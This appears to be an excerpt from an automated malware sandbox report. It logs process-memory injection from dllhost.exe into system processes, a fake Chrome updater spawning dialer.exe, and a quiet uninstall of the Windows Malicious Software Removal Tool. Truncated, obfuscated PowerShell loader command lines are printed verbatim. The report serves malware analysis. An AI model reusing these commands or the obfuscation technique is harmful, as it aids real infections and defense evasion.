          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 281CF7C0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28843650000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1FBADCF0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 40D0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2BEDFE40000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1FFD2D10000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1B38FD50000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D8FD7A0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: EA0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2DD0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2D20000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2EA0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2EB0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 26E0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 22C0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 1460000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 1150000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2620000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2F20000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2940000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: FF0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2560000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2880000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2E50000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 3110000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2EF0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: C00000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: D70000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 25D0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2B40000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 7F0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 6E0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2890000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: EB0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2FC0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 27F0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 13C0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 7E0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: A30000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 740000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2820000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 3030000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 700000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 1110000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2C90000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2AF0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: D60000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2A20000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2EB0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: B60000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 14A0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2FB0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 3130000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 900000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 900000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2C30000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 30F0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 10B0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 23D0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2860000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2BC0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 7B0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2650000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2EF0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 750000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2AB0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 1620000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2B80000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 15A0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 8A0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 24D0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 12A0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2110000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 6F0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: BE0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 25B0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: F20000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 3070000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: E10000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2980000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2EC0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 3110000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2150000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2910000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 3140000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2D20000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 730000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2CD0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: BC0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2730000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2AF0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2360000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 3030000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 13D0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2FC0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 1510000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 8B0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: F70000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 730000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 7E0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F6E6AB0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 217D6390000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1D29E890000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28189530000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 146F6AD0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1BF4B840000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 208BF760000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 23B50E40000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 23B50E70000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CCD9A60000
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{ed3c9ad9-1a05-4753-a177-d35f4db59610}Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe dialer.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{221f05ee-8fb0-4424-9ba0-bc3ff8f1bf74}
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:okulrfyuhqtj{param([outputtype([type])][parameter(position=0)][type[]]$dhhelpdherwtsc,[parameter(position=1)][type]$rguqrffami)$xkbdjiiiaov=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+'e'+[char](102)+''+[char](108)+''+'e'+''+'c'+'t'+'e'+''+[char](100)+''+[char](68)+''+[char](101)+''+'l'+''+[char](101)+''+'g'+''+'a'+'t'+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+''+[char](110)+''+[char](77)+''+[char](101)+''+[char](109)+'o'+[char](114)+'ymo'+'d'+''+[char](117)+''+[char](108)+''+[char](101)+'',$false).definetype('my'+'d'+'el'+[char](101)+''+[char](103)+'a'+'t'+''+'e'+''+[char](84)+'yp'+[char](101)+'',''+[char](67)+''+[char](108)+''+'a'+'ss'+[char](44)+'pu'+'b'+'l'+[char](105)+''+[char](99)+''+','+''+[char](83)+''+'e'+'a'+'l'+''+'e'+'d,'+[char](65)+'ns'+'i'+''+[char](67)+''+[char](108)+'as'+[char](115)+''+[char](44)+''+[char](65)+''+'u'+''+[char](116)+''+'o'+''+[char](67)+''+[char](108)+''+'a'+''+'s'+'s',[multicastdelegate]);$xkbdjiiiaov.defineconstructor(''+[char](82)+''+[char](84)+''+'s'+''+[char](112)+''+[char](101)+'c'+[char](105)+''+'a'+''+[char](108)+''+[char](78)+''+[char](97)+''+'m'+'e,'+'h'+'i'+[char](100)+''+[char](101)+''+[char](66)+'y'+[char](83)+''+[char](105)+'g'+[char](44)+'p'+[char](117)+'b'+'l'+''+[char](105)+'c',[reflection.callingconventions]::standard,$dhhelpdherwtsc).setimplementationflags(''+[char](82)+''+'u'+''+[char](110)+''+[char](116)+'i'+[char](109)+''+[char](101)+''+','+'man'+'a'+'g'+[char](101)+''+[char](100)+'');$xkbdjiiiaov.definemethod(''+[char](73)+''+[char](110)+'v'+'o'+''+[char](107)+''+[char](101)+'',''+[char](80)+''+'u'+''+[char](98)+''+[char](108)+'ic'+','+''+[char](72)+''+'i'+''+[char](100)+''+[char](101)+''+'b'+'y'+[char](83)+''+'i'+'g'+','+'n'+[char](101)+'w'+'s'+''+[char](108)+''+[char](111)+'t'+','+''+'v'+''+[char](105)+''+[char](114)+''+'t'+''+[char](117)+''+[char](97)+''+[char](108)+'',$rguqrffami,$dhhelpdherwtsc).setimplementationflags(''+'r'+''+[char](117)+''+'n'+''+[char](116)+''+[char](105)+''+[char](109)+''+[char](101)+',ma'+[char](110)+''+'a'+''+[char](103)+'e'+'d'+'');write-output $xkbdjiiiaov.createtype();}$hpsmfkkdezpeo=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+'y'+'s'+''+[char](116)+''+[char](101)+''+[char](109)+''+[char](46)+''+'d'+''+[char](108)+''+[char](108)+'')}).gettype('m'+[char](105)+'c'+[char](114)+''+'o'+'s'+'o'+''+[char](102)+''+[char](116)+''+[char](46)+''+[char](87)+''+[char](105)+''+[char](110)+''+'3'+''+[char](50)+''+[char](46)+'u'+'n'+''+'s'+''+[char](97)+''+[char](102)+''+[char](101)+''+[char](78)+''+[char](97)+''+'t'+''+'i'+''+'v'+''+[char](101)+''+[char](77)+''+[char](101)+''+[char](116)+'h'+[char](111)+''+[char](100)+''+[char](115)+'');$azprwzsupdjmw
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:tvjmjwkkljdl{param([outputtype([type])][parameter(position=0)][type[]]$rucvliravsksnu,[parameter(position=1)][type]$ldxjoqsfca)$hzepfdaiuju=[appdomain]::currentdomain.definedynamicassembly((new-object 